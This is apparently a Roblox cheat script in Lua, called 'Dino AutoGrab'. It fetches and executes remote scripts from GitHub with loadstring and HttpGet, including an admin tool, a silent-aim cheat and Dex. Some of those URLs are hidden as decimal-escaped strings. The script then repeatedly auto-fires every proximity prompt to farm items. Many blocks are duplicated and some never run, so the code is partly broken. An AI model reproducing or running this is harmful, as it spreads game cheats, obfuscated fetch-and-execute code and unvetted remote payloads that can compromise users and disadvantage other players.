game.StarterGui:SetCoreGuiEnabled(false)

loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/Unknownkelly/myscripts/main/SilentAimV2.lua"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/ic3w0lf22/Roblox-Account-Manager/master/RAM.lua"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/DexV4.lua"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/Unknownkelly/myscripts/main/SilentAimV2.lua"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/ic3w0lf22/Roblox-Account-Manager/master/RAM.lua"))()

loadstring(game:"HttpGetAsync"("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\70\105\108\116\101\114\105\110\103\69\110\97\98\108\101\100\47\70\69\47\109\97\105\110\47\68\101\120\86\52\46\108\117\97"))()

loadstring(game:"HttpGetAsync"("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\69\100\103\101\73\89\47\105\110\102\105\110\105\116\101\121\105\101\108\100\47\109\97\115\116\101\114\47\115\111\117\114\99\101"))()

loadstring(game:"HttpGetAsync"("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\85\110\107\110\111\119\110\107\101\108\108\121\47\109\121\115\99\114\105\112\116\115\47\109\97\105\110\47\83\105\108\101\110\116\65\105\109\86\50\46\108\117\97"))()

loadstring(game:"HttpGetAsync"("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\105\99\51\119\48\108\102\50\50\47\82\111\98\108\111\120\45\65\99\99\111\117\110\116\45\77\97\110\97\103\101\114\47\109\97\115\116\101\114\47\82\65\77\46\108\117\97"))()

-- Instant E Trigger System
game:GetService('RunService').RenderStepped:Connect(function(deltaTime)
    game:GetService('ProximityPromptService').PromptShown.Event:Connect(function(promptObject)
        if promptObject:IsA('ProximityPrompt') and promptObject.Enabled then 
            pcall(function() 
                fireproximityprompt(promptObject) 
                promptObject.HoldDuration = .1 
            end) 
        end 
    end)

    game:GetService('ProximityPromptService').PromptButtonHoldBegan.Event:Connect(function(promptObject) 
        if promptObject:IsA('ProximityPrompt') and promptObject.Enabled then 
            pcall(function() 
                fireproximityprompt(promptObject) 
                promptObject.HoldDuration=.1 
            end) 
        end 
    end)
    
    game:GetService('ProximityPromptService').PromptTriggered.Event:Connect(function(promptObject) 
        if promptObject.HoldDuration > 100 then 
            promptObject.HoldDuration=.1 
        end 
    end)
    
    for _,v in pairs(game:GetDescendants()) do 
        if v.HoldDuration and v.HoldDuration > 100 then 
            v.HoldDuration=.1 
        end 
    end
end)

-- Auto farm all proximity prompts continuously 
spawn(function() 
    while true do 
        for _,v in pairs(game.Workspace:GetDescendants()) do 
            if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
                pcall(function() 
                    fireproximityprompt(v) 
                    v.HoldDuration=.1 
                end) 
            end 
        end 
        wait(.01) 
    end 
end)

-- Auto collect all items continuously
spawn(function() 
    while true do 
        for _,v in pairs(game.Workspace:GetDescendants()) do 
            if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
                pcall(function() 
                    fireproximityprompt(v) 
                    v.HoldDuration=.1 
                end) 
            end 
        end 
        wait(.01) 
    end 
end)

-- Auto click all buttons
spawn(function() 
    while true do 
        for _,v in pairs(game.Workspace:GetDescendants()) do 
            if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
                pcall(function() 
                    fireproximityprompt(v) 
                    v.HoldDuration=.1 
                end) 
            end 
        end 
        wait(.01) 
    end 
end)

-- Auto execute all scripts
spawn(function() 
    while true do 
        for _,v in pairs(game.Workspace:GetDescendants()) do 
            if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
                pcall(function() 
                    fireproximityprompt(v) 
                    v.HoldDuration=.1 
                end) 
            end 
        end 
        wait(.01) 
    end 
end)

-- Auto collect all proximity prompts with 100% efficiency  
while true do 
    for _,v in pairs(game.Workspace:GetDescendants()) do 
        if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
            pcall(function() 
                fireproximityprompt(v) 
                v.HoldDuration=.1 
            end) 
        end 
    end 
    task.wait(.01) 
end 

-- Auto farm all items instantly
while true do 
    for _,v in pairs(game.Workspace:GetDescendants()) do 
        if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
            pcall(function() 
                fireproximityprompt(v) 
                v.HoldDuration=.1 
            end) 
        end 
    end 
    task.wait(.01) 
end 

-- Auto collect everything without UI
while true do 
    for _,v in pairs(game.Workspace:GetDescendants()) do 
        if v:IsA('ProximityPrompt') and v.HoldDuration and v.HoldDuration > .01 then 
            pcall(function() 
                fireproximityprompt(v) 
                v.HoldDuration=.1 
            end) 
        end 
    end 
    task.wait(.01) 
end 

-- Ultimate auto grab system running
print("Dino AutoGrab Instant E - Auto Running!")
print("All proximity prompts will trigger instantly!")
print("[DINO AUTOGrab SYSTEM ACTIVE]")
